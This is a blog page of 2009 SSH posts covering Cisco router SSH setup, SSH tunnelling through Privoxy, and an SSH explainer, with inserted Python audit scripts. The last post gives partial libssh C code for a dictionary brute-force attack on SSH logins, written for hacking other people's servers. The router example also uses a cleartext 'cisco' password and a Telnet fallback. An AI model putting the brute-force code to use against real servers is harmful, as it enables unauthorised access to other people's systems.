Showing posts with label SSH. Show all posts

Wednesday, December 16, 2009

Setting Up SSH on a Cisco Router

In this post I'll demonstrate how to configure SSH on a Cisco router.


Below are the commands I used to name the router and provide a domain name. These details are required prior to generating the key. I then generate a 2048-bit RSA key (this took about 10 minutes, I should have done 1024). Following the key creation I configure SSH to have a 60 minute timeout, to use SSH version 2 and to exit after 3 failed login attempts. Finally I assign SSH and Telnet (for backup) to my VTY ports and create a user called Bob.


Router>enable
Password:
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname R1
R1(config)#ip domain-name home.local
R1(config)#crypto key generate rsa general-keys modulus 2048
The name for the keys will be: R1.home.local
% The key modulus size is 2048 bits
% Generating 2048 bit RSA keys, keys will be non-exportable...[OK]
R1(config)#ip ssh time-out 60
R1(config)#ip ssh authentication-retries 3
R1(config)#ip ssh version 2
R1(config)#line vty 0 4
R1(config-line)#transport input ssh telnet
R1(config-line)#exit
R1(config)#aaa new-model
R1(config)#username bob password 0 cisco
R1(config)#exit



I use PuTTY to connect with SSH and I'm presented with a dialogue to accept the certificate as shown below.



I then log in with my bob credentials.



And a quick packet capture shows me that I am encrypting my traffic with SSH.
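
An added example, not part of the original post: a small audit of the configuration entered above. It flags the Telnet fallback on the VTY lines and the cleartext `password 0` user, and shows that a variant using `transport input ssh` and `username ... secret` passes. The function name, the finding strings and the hardened variant (with a placeholder hash) are assumptions made for illustration.

```python
import re

# The commands entered in the post, laid out as configuration text.
POSTED_CONFIG = """\
hostname R1
ip domain-name home.local
ip ssh time-out 60
ip ssh authentication-retries 3
ip ssh version 2
aaa new-model
username bob password 0 cisco
line vty 0 4
 transport input ssh telnet
"""

# Assumed hardened variant: hashed secret (placeholder) and SSH-only VTY lines.
HARDENED_CONFIG = (POSTED_CONFIG
                   .replace("password 0 cisco", "secret 5 <hash-placeholder>")
                   .replace("input ssh telnet", "input ssh"))

def audit_ssh_config(config_text):
    """Return a sorted list of findings for an IOS-style configuration."""
    findings = []
    current_line = None            # the "line ..." block being read, if any
    ssh_v2_only = False
    for raw in config_text.splitlines():
        stripped = raw.strip()
        if not raw.startswith(" "):    # a top-level command ends a line block
            current_line = stripped if stripped.startswith("line ") else None
        if stripped == "ip ssh version 2":
            ssh_v2_only = True
        m = re.match(r"username (\S+) password (?:(\d) )?\S+", stripped)
        if m and m.group(2) in (None, "0"):
            findings.append(f"user {m.group(1)}: cleartext (type 0) password")
        if current_line and stripped.startswith("transport input "):
            protocols = stripped.split()[2:]
            if "telnet" in protocols or "all" in protocols:
                findings.append(f"{current_line}: telnet accepted")
    if not ssh_v2_only:
        findings.append("SSH version 1 not disabled")
    return sorted(findings)

if __name__ == "__main__":
    for name, cfg in (("posted", POSTED_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_ssh_config(cfg) or "no findings")
```
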


Saturday, December 12, 2009

SSH Tunneling the Pretty Way

This is just a quick post about a nice little tool I found that allows you to set up and save your SSH tunnels and then quickly bring them up when required. Why might you want to do this? Well, there are plenty of reasons. They range from it feels geeky, to you're paranoid about those kids in the coffee shop with the "Hack Naked" stickers on their laptops, to just because you can.

Now this guide does assume that you have an SSH server that you can get to and that it's running Privoxy on port 8118.

The tool is Gnome SSH Tunnel Manager (gSTM) and is available from http://gstm.sourceforge.net or the repositories.

apt-get install gstm

Now, a quick reminder of the manual way:

ssh -NL 8118:localhost:8118 synjunkie@ssh_server_ipaddress

Then point your browser's proxy at localhost:8118

And now the pretty way.

Create The Tunnel

Open gSTM from Applications > Internet Menu, and enter your SSH server details. Click Add to configure the port redirection settings and click OK.



Save the settings by clicking OK.



Now you have a tunnel that is saved for you and can be started by clicking on the Start button.


Configure The Browser

Now you need to tell Firefox to use your tunnel. Open Firefox Preferences from the Edit menu in Firefox and amend the network proxy settings.



Now you can safely browse the web.

You could make this even more seamless by adding a Firefox extension to allow you to have multiple proxy configurations set up and simply select which one you want using a drop-down list on the toolbar. Switch Proxy works well for this.


Check The Tunnel

You can test that your traffic is being tunneled by using Netstat, Etherape, TCPDump or a number of other tools. Below I have used Netstat.



I can see that I am making connections to local port 8118 and that the only external web traffic is going to my SSH server.

When I used Etherape to check my traffic I saw that DNS was not tunneled, so one thing to bear in mind is that if your attacker is subverting your DNS, the whole tunnel will not work. Which I guess is better than it working and your data being stolen!
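
An added example, not part of the original post: the Netstat check above turned into a script that sorts connections into browser-to-proxy, the SSH session, DNS lookups outside the tunnel, and anything else leaving the machine directly. The netstat output is constructed, and the addresses, function names and bucket names are assumptions.

```python
# Constructed `netstat -tun` output for illustration (not from the post).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:45012         127.0.0.1:8118          ESTABLISHED
tcp        0      0 127.0.0.1:8118          127.0.0.1:45012         ESTABLISHED
tcp        0      0 192.168.1.20:51822      203.0.113.10:22         ESTABLISHED
tcp        0      0 192.168.1.20:40410      198.51.100.80:80        ESTABLISHED
udp        0      0 192.168.1.20:38211      192.168.1.1:53          ESTABLISHED
"""

def classify_connections(netstat_text, ssh_server, ssh_port=22, proxy_port=8118):
    """Sort each connection into: proxy (browser <-> local forward),
    tunnel (SSH session to the server), dns (lookups outside the tunnel),
    or direct (anything else leaving the machine)."""
    buckets = {"proxy": [], "tunnel": [], "dns": [], "direct": []}
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue                      # header or unrelated line
        local, remote = fields[3], fields[4]
        lhost, lport = local.rsplit(":", 1)
        rhost, rport = remote.rsplit(":", 1)
        loopback = lhost.startswith("127.") and rhost.startswith("127.")
        if loopback and str(proxy_port) in (lport, rport):
            buckets["proxy"].append(remote)
        elif rhost == ssh_server and rport == str(ssh_port):
            buckets["tunnel"].append(remote)
        elif rport == "53":
            buckets["dns"].append(remote)
        elif not loopback:
            buckets["direct"].append(remote)
    return buckets

def tunnel_is_clean(buckets):
    """True when the SSH session is up and no other traffic bypasses it."""
    return bool(buckets["tunnel"]) and not buckets["direct"]

if __name__ == "__main__":
    found = classify_connections(SAMPLE_NETSTAT, "203.0.113.10")
    for kind, remotes in found.items():
        print(f"{kind:7} {remotes}")
    print("clean:", tunnel_is_clean(found))
```
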


See my previous post for more details on tunneling without a GUI

SSH Tunneling

This is a quick blog post to let my mate Ollie know about a few ways that I use SSH and how it is useful.

Firstly, an SSH client connects to an SSH server, logs in with either a password or certificate and communicates over an encrypted tunnel. The beauty of SSH is that it is also easy to tunnel other types of traffic such as HTTP or VNC over the tunnel. This is useful for the following:

> Secure Administration of a remote server.
> Secure File transfer.
> Securing web traffic over a non-secure wired or wireless network.
> Bypassing of restrictions and filtering imposed on the local network.


Tools

> Privoxy
> SSH
> Screen


Setup

At home I have installed SSH on a server and started the service (/etc/init.d/ssh start) listening on port 22 for SSH traffic. I have set port forwarding up on my firewall to allow traffic to hit the server on this port. Usually I will set up a non-standard port but for the sake of an easy explanation I'll leave it at port 22.

On that server I have also installed Privoxy (apt-get install privoxy) and started it (/etc/init.d/privoxy start). By default, Privoxy binds to 127.0.0.1:8118. I have also installed Screen, a program that allows you to have multiple terminal sessions open at once and leave them running after disconnecting from the SSH server.


Connecting To The Server

From my client I connect to the server by using the following command:

ssh synjunkie@ssh_server_ipaddress


After logging in I can issue commands as if I'm sitting at the server. After connecting I would start Screen by issuing the `screen` command. If I wanted to connect to a previous screen session I would use `screen -r`.

You navigate through Screen by issuing commands through key-bindings. A few of the ones I find most useful are:

Ctrl+a c new window
Ctrl+a n next window
Ctrl+a p previous window
Ctrl+a " select window from list
Ctrl+a A set window title
Ctrl+a ? show key bindings/command names
Ctrl+a d detach screen from terminal

Screen is great because you can leave a scan going in one session, IRC in another and, say, a traffic capture in another.


Tunneling Traffic

As well as connecting to the server I might want to tunnel some traffic over SSH to my home server and then back out.

For this I would issue the following command on my client and log in.

ssh -NL 8118:localhost:8118 synjunkie@ssh_server_ipaddress

After setting up the tunnel I would go into the proxy settings on my browser and point them to localhost port 8118.


I hope this illustrates a couple of good uses for SSH.

Friday, October 23, 2009

What is SSH?

SSH, or secure shell, is an application that replaces remote login tools such as telnet, rsh, and rlogin. It is similar to VNC or remote desktop, but much more secure. The difference is that SSH is used to control a remote computer through a command line interface (text mode), or to put it more plainly, it is like working at the command prompt on the Windows operating system, so it is naturally faster and more responsive.

It was first developed by the OpenBSD project, and the p (port) release versions are then managed by the team that ports it to other operating systems, including Linux. The main function of this application is to access machines remotely.

With SSH, the whole conversation between server and client is encrypted. This means that if the conversation is intercepted, the eavesdropper cannot understand its contents. Imagine you are maintaining a server from far away, with an account that has special privileges of course, and without your knowledge that account and password are sniffed by someone else, who then trashes your server.

The encryption algorithms supported by SSH include Blowfish (Bruce Schneier), Triple DES (a development of DES by IBM), IDEA (the International Data Encryption Algorithm), and RSA (Rivest-Shamir-Adleman). With the various encryption methods SSH supports, you can switch quickly if one of the algorithms you have set up runs into trouble.

I bet you think SSH can't be cracked. If that is what you think, you are badly mistaken! Remember, friend, no system is 100% secure; everything man-made has weaknesses. As my friend from surabayahackerlink says, there are many roads to hell, my friend.

We will do it with the brute force technique. I hope the terms brute force and password guessing don't need to be argued over again; if you don't know yet what brute force or password guessing is, look up the definition yourself on Uncle Google.

Materials needed:
1. One pack of Sampoerna Mild cigarettes
2. One crate of Teh Botol
3. Snacks and a music player, for when you get stuck
4. Dictionary attack, just download it from hacker sites
5. A computer, obviously; without one, are you going to crack with a stove?
6. libssh.h, again look for it on Uncle Google

A bit of source code from libssh.h, just as an example:

#define AUTH_SUCCESS 0

/* in client.c */

SSH_SESSION *ssh_connect(SSH_OPTIONS *options);
void ssh_disconnect(SSH_SESSION *session);

/* in options.c */

SSH_OPTIONS *ssh_getopt(int *argcptr, char **argv);
void options_set_username(SSH_OPTIONS *opt,char *username);
void options_set_host(SSH_OPTIONS *opt, const char *host);
void options_set_port(SSH_OPTIONS *opt, unsigned int port);

/* in auth.c */

int ssh_userauth_password(SSH_SESSION *session,char *username,char *password);

Compile the rest yourself with gcc, and find libssh.h and the *.c files that are needed yourself. Now all that is left is to implement the functions above in the SSH brute force whose code we are going to assemble.

#include <stdio.h>
#include <libssh/libssh.h>
#define PORT 22

/* Try one user/password pair against host and print the result. */
void checkauth(char *user, char *password, char *host)
{
    SSH_SESSION *session;
    SSH_OPTIONS *options;
    int argc=1;
    char *argv[]={"none"};

    options=ssh_getopt(&argc,argv);
    options_set_username(options,user);
    options_set_host(options,host);
    options_set_port(options,PORT);
    session=ssh_connect(options);
    if(!session) return ;

    if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
    {
        printf("%s:%s:%s -> BaD Password\n",user,password,host);
        ssh_disconnect(session);
        return;
    }else{
        /* warn is not declared in the excerpt shown here */
        printf("%sManteb juragan.Coba ini : %s:%s:%s\n",warn,user,password,host);
    }
}

Let’s compile and hack for fun !!

Source code from kecoak team
